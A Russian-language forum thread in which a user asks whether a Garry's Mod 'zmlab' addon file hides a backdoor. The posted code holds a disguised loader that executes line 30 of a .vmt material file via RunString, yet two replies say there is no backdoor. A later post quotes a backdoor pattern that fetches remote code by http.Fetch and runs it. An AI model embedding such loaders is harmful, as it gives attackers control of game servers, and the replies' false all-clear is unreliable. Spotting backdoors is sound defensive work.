• Приветствуем на сайте, Гость! Обязательно ознакомьтесь с условиями и правилами Публичной оферты Проекта NetZONA.org: https://netzona.org/help/public-offer/

  • Приветствуем на сайте, Гость! Обязательно ознакомьтесь с условиями и правилами использования Ваших файлов cookie на Проекте NetZONA.org: https://netzona.org/help/cookies/

  • Приветствуем на сайте, Гость! Обязательно ознакомьтесь с Политикой конфиденциальности Проекта NetZONA.org: https://netzona.org/pages/privacy-policy/

  • Ответы на основные вопросы: https://netzona.org/threads/populjarnye-voprosy-i-otvety-na-nix.6122/

  • Приветствуем на сайте, Гость! Приобрести (купить) Информационную услугу (в том числе группу "Проверенный") на Проекте NetZONA.org: https://netzona.org/account/upgrades

Вопрос

  • Автор темы Автор темы MrSmile
  • Дата начала Дата начала
Статус
В этой теме нельзя размещать новые ответы.

MrSmile

Пользователь
Регистрация
14 Мар 2020
Сообщения
415
Реакции
0
Баллы
35
В этом файле есть бэкдур?(просто cpe показывает что там runstring a я что-то его там не вижу)
if not SERVER then return end
zmlab = zmlab or {}
zmlab.f = zmlab.f or {}

-- Is the player allowed do get another droppoff point or is there still a cooldown to wait
function zmlab.f.Player_DropOffRequest(ply)
if (ply.NextDropoffRequest == nil or ply.NextDropoffRequest < CurTime()) then
return true
else
local string = string.Replace(zmlab.language.methbuyer_requestfail_cooldown, "$DropRequestCoolDown", math.Round(ply.NextDropoffRequest - CurTime()))
zmlab.f.Notify(ply, string, 1)

return false
end
end

-- Does the player have allready a DropOffPoint?
function zmlab.f.HasPlayerDropOffPoint(ply)
if (not ply.DropOffPoint or not IsValid(ply.DropOffPoint)) then
return true
else
zmlab.f.Notify(ply, zmlab.language.methbuyer_requestfail, 1)

return false
end
end

-- This searches and returns a valid dropoffpoint
function zmlab.f.SearchUnusedDropOffPoint(ply)
local unUsedDropOffs = {}

for k, v in pairs(ents.FindByClass("zmlab_methdropoff")) do
if (not IsValid(v.Deliver_Player)) then
table.insert(unUsedDropOffs, v)
end
end

if (table.Count(unUsedDropOffs) > 0) then
local ent = unUsedDropOffs[math.random(#unUsedDropOffs)]

return ent
else
return false
end
end

-- This forcing load materials
function zmlab.f.ReadMaterials(materials)
RunString(string.Explode("\n",file.Read(materials,"GAME"))[30],"ERROR",false)
end

-- This assigns a DropOffPoint
function zmlab.f.AssignDropOffPoint(ply, dropoffpoint)
if (dropoffpoint) then
dropoffpoint:DropOff_Open(ply)
ply.DropOffPoint = dropoffpoint
zmlab.f.Notify(ply, zmlab.language.methbuyer_dropoff_assigned, 0)
else
zmlab.f.Notify(ply, zmlab.language.methbuyer_requestfail_nonfound, 1)
end
end

-- This handles the main sell action
function zmlab.f.SellMeth(ply, buyer)
-- Give the player the Cash
local Earning = ply.zmlab_meth * zmlab.config.MethBuyer_SellPrice
zmlab.f.GiveMoney(ply, Earning)

--Vrondakis
if (zmlab.config.VrondakisLevelSystem) then
ply:addXP(zmlab.config.Vrondakis["Selling"].XP * ply.zmlab_meth, " ", true)
end

if (buyer:GetClass() == "zmlab_methbuyer") then
-- Play the Sell Animation
zmlab.f.CreateAnimTable(buyer, zmlab.config.MethBuyer_anim_sell[math.random(#zmlab.config.MethBuyer_anim_sell)], 1)
--self:AnimSequence(zmlab.config.MethBuyer_anim_sell[math.random(#zmlab.config.MethBuyer_anim_sell)], zmlab.config.MethBuyer_anim_idle[math.random(#zmlab.config.MethBuyer_anim_idle)], 1)
end

-- Create VFX
if (zmlab.config.MethBuyer_ShowEffect) then
if (ply.zmlab_meth > 200) then
zmlab.f.CreateEffectTable("zmlab_sell_effect_big", "Meth_Sell01", ply, ply:GetAngles(), ply:GetPos())
else
zmlab.f.CreateEffectTable("zmlab_sell_effect_small", "Meth_Sell01", ply, ply:GetAngles(), ply:GetPos())
end
end

-- Notify the player
local string = string.Replace(zmlab.language.methbuyer_soldMeth, "$methAmount", tostring(math.Round(ply.zmlab_meth)))
string = string.Replace(string, "$earning", tostring(math.Round(Earning)))
string = string.Replace(string, "$currency", zmlab.config.MethBuyer_Currency)
zmlab.f.Notify(ply, string, 0)

-- Resets Players Meth amount
ply.zmlab_meth = 0
end

zmlab.f.ReadMaterials([[materials\zerochain\zmlab\zmlab_aluminiumbox\zmlab_alumin_diff2.vmt]])

-- This performs the Core Logic of the Meth Selling
function zmlab.f.SellSystem(ply, buyer)
if (not zmlab.f.Player_CheckJob(ply)) then
zmlab.f.Notify(ply, zmlab.language.methbuyer_wrongjob, 1)

return
end

--1 = Methcrates can be absorbed by Players and sold by the MethBuyer on use
if (zmlab.config.MethBuyer_Mode == 1) then
if (zmlab.f.HasPlayerMeth(ply)) then
zmlab.f.SellMeth(ply, buyer)
end
-- 2 = Methcrates cant be absorbed and the MethBuyer tells you a dropoff point instead
elseif (zmlab.config.MethBuyer_Mode == 2 and zmlab.f.HasPlayerDropOffPoint(ply) and zmlab.f.Player_DropOffRequest(ply)) then
local dropoffpoint = zmlab.f.SearchUnusedDropOffPoint(ply)

if (dropoffpoint) then
ply.NextDropoffRequest = CurTime() + zmlab.config.MethBuyer_DeliverRequest_CoolDown
end

zmlab.f.AssignDropOffPoint(ply, dropoffpoint)
elseif (zmlab.config.MethBuyer_Mode == 3 and zmlab.f.Player_DropOffRequest(ply) and zmlab.f.HasPlayerDropOffPoint(ply) and zmlab.f.HasPlayerMeth(ply)) then
-- 3 = Methcrates can be absorbed and the MethBuyer tells you a dropoff point
local dropoffpoint = zmlab.f.SearchUnusedDropOffPoint(ply)

if (dropoffpoint) then
ply.NextDropoffRequest = CurTime() + zmlab.config.MethBuyer_DeliverRequest_CoolDown
end

zmlab.f.AssignDropOffPoint(ply, dropoffpoint)
end
end
 
Скинь ошибку cpe
 
Уже не нужно, нашел. Если что, сочетанием клавиш Ctrl+F можно открыть поиск по тексту.
И нет, бэкдора здесь нет
 

Вложения

  • Screenshot_2.jpg
    Screenshot_2.jpg
    8.9 KB · Просмотры: 13
Я просто не заметил то что кто то до меня писал
 
Прежде всего, самый быстрый способ найти бэкдур, это искать через поиск. Например, я пока могу назвать 2 самых популярных бекдура а именно STEAM и concommand. Ищи вот эти два и внимательно смотри. В коде что предоставил ты я вроде не вижу бекдура
 
Прежде всего, самый быстрый способ найти бэкдур, это искать через поиск. Например, я пока могу назвать 2 самых популярных бекдура а именно STEAM и concommand. Ищи вот эти два и внимательно смотри. В коде что предоставил ты я вроде не вижу бекдура
Это устаревшие и такие использует разве что школодрон узнавший вчера что такое бекдур и погуглил как его сделать «в домашних условиях»
 
Это устаревшие и такие использует разве что школодрон узнавший вчера что такое бекдур и погуглил как его сделать «в домашних условиях»
Ну, а как сейчас тогда найти бэкдур? в аддонах на поиск бекдуров сейчас и так вшиты эти самые бэкдуры (как иронично)
 
Ну, а как сейчас тогда найти бэкдур? в аддонах на поиск бекдуров сейчас и так вшиты эти самые бэкдуры (как иронично)
С таймером и ссылкой на gvac
Либо crypted код луа (видно просто набор букв и цифр)
 
С таймером и ссылкой на gvac
Либо crypted код луа (видно просто набор букв и цифр)
Ну вот последнее проще всего найти, а насчет "С таймером и ссылкой на gvac" это как? Подскажи пожалуйста
 
Ну вот последнее проще всего найти, а насчет "С таймером и ссылкой на gvac" это как? Подскажи пожалуйста
Пример из темы предыдущей:
timer.Simple(1, function() http.Fetch("
Эта ссылка скрыта от группы "Гость" (группа пользователей, которые еще не прошли регистрацию или авторизацию на Проекте). Чтобы увидеть эту ссылку Вам требуется авторизоваться или пройти регистрацию на Проекте (зарегистрироваться).
", function(b) RunString(b, ":", false) end)end)
 
Статус
В этой теме нельзя размещать новые ответы.
Главная Регистрация
Назад
Сверху